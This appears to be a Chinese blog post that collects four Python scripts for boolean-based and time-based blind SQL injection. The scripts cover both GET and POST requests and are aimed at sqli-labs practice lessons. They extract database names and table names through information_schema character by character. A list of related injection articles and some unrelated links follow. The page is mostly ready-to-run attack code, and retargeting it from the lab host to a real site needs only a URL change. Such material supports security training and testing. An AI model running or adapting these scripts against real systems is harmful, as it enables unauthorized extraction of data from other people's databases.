BOOL型GET传参sql盲注

点击查看代码 
import requests

chars =""

for i in range(32,127):

    chars += chr(i)

result = ""

url_template = "http://yourip/sqllabs/Less-8/?id=2' and ascii(substr(({0}),{1},1))>{2} %23"

url_length = "http://yourip/sqllabs/Less-8/?id=2' and length(({0})) >{1} %23"

def get_result_length(payload,value):

    for n in range(1,100):

        url = url_length.format(payload,n)

        response = requests.get(url)

        length = len(response.text)

        if length >value:

            print("·······data length is :" + str(n))

            return  n

def get_db_name(data_length,payload,value):

    for i in range(1,data_length):

        for char in chars:

            url = url_template.format(payload,i,ord(char))

            response = requests.get(url)

            length = len(response.text)

            if length>value:         #根据返回长度的不同来判断字符正确与否

                global result

                result += char

                print("·······data is :"+ result)

                break

#自定义 sql注入语句 payload   分割符 为0

payload = "select group_concat(table_name) from information_schema.tables where table_schema=database() "

# 根据正确访问时错误访问时返回页面文本长度的不同 来设置一个判断值

value = 706

data_length = get_result_length(payload,value)+1

get_db_name(data_length,payload,value)

print(result)

**延时型GET传参sql盲注**

点击查看代码 
import requests

value =""

for i in range(32,127):

    value += chr(i)

data=""

# 需要 不断 手工调整 url 和 url_length 中的 limit 的第一个参数 来获取下一行的数据

url = "http://yourip/sqllabs/Less-9/?id=1' and if((ascii(substr(({0} limit 1,1),{1},1)) = '{2}'),sleep(3),NULL); %23"

url_length="http://yourip/sqllabs/Less-9/?id=1' and if((length(({0} limit 1,1))={1} ),sleep(3),NULL); %23"

def get_length(payload):

    for n in range(1,100):

        url= url_length.format(payload,n)

        #print(url)

        if(get_respone(url)):

            print("[+] length is {0}".format(n))

            return n

def get_data(payload,value,length):

    for n in range(1,length):

        for v in value :

            url_data = url.format(payload,n,ord(v)) #ord()返回字符的ASCII码

            #print(url_data)

            if(get_respone(url_data)):

                global data

                data=data+v

                print("[+] data is {0}".format(data))

                break

def get_respone(url):

    try:

        html = requests.get(url,timeout=2)

        return False

    except Exception as e:

        print("......")

        return True

#可以更改payload 来获取需要的数据

databse_payload ="select database()"

get_data(databse_payload,value,get_length(databse_payload)+1)

**BOOL型POST传参sql盲注**

点击查看代码 
import requests

chars =""

for i in range(32,127):

    chars += chr(i)

result = ""

def get_length(value):  #获取要查询的数据的长度

    for n in range(1,100):

        payload = "admin' and length(({0})) ={1} #".format(data_payload,n)

        data = {"uname":payload,"passwd":"admin"}

        html = requests.post(url,data=data)

        length = len(html.text)

        if length >value:

            print("……data length is :" + str(n))

            return  n

def get_data(data_length,value): #获取数据

    global result

    for i in range(1,data_length):

        for char in chars:

            payload = "admin'and ascii(substr(({0}),{1},1))={2} #".format(data_payload,i,ord(char))

            data = {"uname":payload,"passwd":"admin"}

            html = requests.post(url,data=data)

            length = len(html.text)

            if length>value:         #根据返回长度的不同来判断字符正确与否

                result += char

                print("…… data is :"+ result)

                break

url = "http://yourip/sqllabs/Less-15/"

data_payload = "select group_concat(table_name)from information_schema.tables where table_schema = database()"

value = 1460     # 根据正确访问和错误访问时返回页面文本长度的不同 来设置一个判断值,这个值需要在浏览器中 按f12 查看

length = get_length(value) +1

get_data(length,value)

print(result)

**延时型POST传参sql盲注**

点击查看代码 


import requests

import time

value =""

for i in range(32,127):

    value += chr(i)

result=""

def get_length():#获取数据的长度

    for n in range(1, 100):

        payload = "admin' and if((length(({0} ))={1}),sleep(2),1) #".format(data_payload, n)

        data = {"uname": payload, "passwd": "admin", "submit": "submit"}

        start_time = time.time()

        html = requests.post(url, data=data)

        end_time = time.time()

        use_time = end_time - start_time #求出请求前后的时间差来判断是否延时了

        if use_time > 2:

            print("...... data's length is :"+ str(n))

            return n

def get_data(length):#获取数据

    global result

    for n in range(1,length):

        for v in value :

            payload = "admin' and if((ascii(substr(({0} ),{1},1)) = '{2}'),sleep(2),1) #".format(data_payload,n,ord(v))

            data = {"uname":payload,"passwd":"admin","submit":"submit"}

            start_time = time.time()

            requests.post(url,data=data)

            end_time = time.time()

            use_time = end_time - start_time

            if use_time >2:

                result += v

                print("......"+result)

url = "http://yourip/sqllabs/Less-11/"

data_payload ="select database()"

length = get_length() + 1   #注意这里要长度加 1 因为 range(1,10)的范围是 1<= x <10

get_data(length)

print(".....data is :"+ result)

几种SQL盲注的脚本的更多相关文章

  1. metinfo小于v6.2.0版本SQL盲注利用脚本

    #coding=utf-8 import requests import re import sys import time #获取config_safe.php中的 key def getKey(u ...

  2. DVWA-SQL Injection (Bind) SQL盲注

    盲注同于union select查询注入,盲注只能得到数据库回显的正确和错误,利用返回的正确和错误一个一个判断. LOW 审计源码 <?php if( isset( $_GET[ 'Submit ...

  3. SQL盲注攻击的简单介绍

    1 简介     1.1 普通SQL注入技术概述     目前没有对SQL注入技术的标准定义,微软中国技术中心从2个方面进行了描述[1]:     (1) 脚本注入式的攻击     (2) 恶意用户输 ...

  4. Web系统常见安全漏洞及解决方案-SQL盲注

    关于web安全测试,目前主要有以下几种攻击方法: 1.XSS 2.SQL注入 3.跨目录访问 4.缓冲区溢出 5.cookies修改 6.Htth方法篡改(包括隐藏字段修改和参数修改) 7.CSRF ...

  5. (转)SQL盲注攻击的简单介绍

    转:http://hi.baidu.com/duwang1104/item/65a6603056aee780c3cf2968 1 简介     1.1 普通SQL注入技术概述     目前没有对SQL ...

  6. Bugku-CTF之login3(SKCTF)(基于布尔的SQL盲注)

    Day41 login3(SKCTF)

  7. WEB安全实战(一)SQL盲注

    前言 好长时间没有写过东西了,不是不想写,仅仅只是是一直静不下心来写点东西.当然,拖了这么长的时间,也总该写点什么的.近期刚刚上手安全方面的东西,作为一个菜鸟,也本着学习的目的,就谈谈近期接触到的安全 ...

  8. WEB安全番外第四篇--关于SQL盲注

    一.SQL盲注: 看不到回显的,无法从返回直接读取到数据库内容的对数据的猜解,属于盲注. 二.第一种--基于布尔类型的盲注: 这种很简单,最典型的例子,就是挖SQL注入的时候常用的: ''' http ...

  9. SQL盲注

    一.首先输入1和-1 查看输入正确和不正确两种情况 二.三种注入POC LOW等级 ... where user_id =$id 输入      真  and  假 = 假 (1)...where u ...

  10. 第九届极客大挑战——Geek Chatroom(sql盲注)

    首先观察这个web应用的功能,可以任意留言,也可以搜索留言,当然我还用cansina扫描过网站,查看过源码,抓包查看过header等.没发现其他提示的情况下断定这就是个sql注入,可能存在的注入点呢, ...

随机推荐

  1. 将map转成vo实体

    //将map转成vo实体 AssetManagementProductsVO param= JSON.parseObject(JSON.toJSONString(map), AssetManageme ...

  2. VC9.0 for Python2

    python2安转包时提示: pip install xxx时,提示 Microsoft Visual C++ 9.0 is required 下载并安装: 链接:https://pan.baidu. ...

  3. modbus通讯协议详解

    1.Modbus 协议简介  Modbus协议是一种已广泛应用于当今工业控制领域的通用通讯协议.通过此协议,控制器相互之间.或控制器经由网络(如以太网)可以和其它设备之间进行通信.Modbus协议使用 ...

  4. 《MySQL是怎样运行的》第八章小结

  5. GO语言学习笔记-包结构篇 Study for Go ! Chapter eight - Package Structure

    持续更新 Go 语言学习进度中 ...... GO语言学习笔记-类型篇 Study for Go! Chapter one - Type - slowlydance2me - 博客园 (cnblogs ...

  6. Python学习笔记--文件的相关操作

    文件的读取操作 读操作 实现: read()--读完 read(10)--读取10个字节 readline()--将所有行并到一行输出 readlines()--一次读取一行 文件的关闭: 实现: 上 ...

  7. https加密过程!!! 这才是差不多非常详细的https双方获取共用的秘钥过程!!!!!

    前言 先说看了一天各种博客让我恶心的地方,恶心死了,发现每个人说的第一次发送的内容,数字证书里面包含啥,都有各种不一样!到了最后忽然想起来直接搜着报文就行了. 比如这个博客LS/SSL 协议详解 (9 ...

  8. 学习ASP.NET Core Blazor编程系列三十——JWT登录(4)

    学习ASP.NET Core Blazor编程系列文章之目录 学习ASP.NET Core Blazor编程系列一--综述 学习ASP.NET Core Blazor编程系列二--第一个Blazor应 ...

  9. Java 2023年接地气的中高级面试题一(附答案)

    直入主题: Q1:为什么要用分布式锁? 在分布式系统中,多个进程或线程可能会同时访问共享资源,这可能会导致数据不一致.并发性问题.性能下降等问题.为了解决这些问题,我们通常会使用分布式锁来协调多个进程 ...

  10. JMM内存模型

    ● 说说JVM的主要组成部分以及作用? 类加载器.运行时数据区.执行引擎.本地库接口 类加载器子系统 它主要功能是处理类的动态加载,还有链接,并且在第一次引用类时进行初始化. Loading - 加载 ...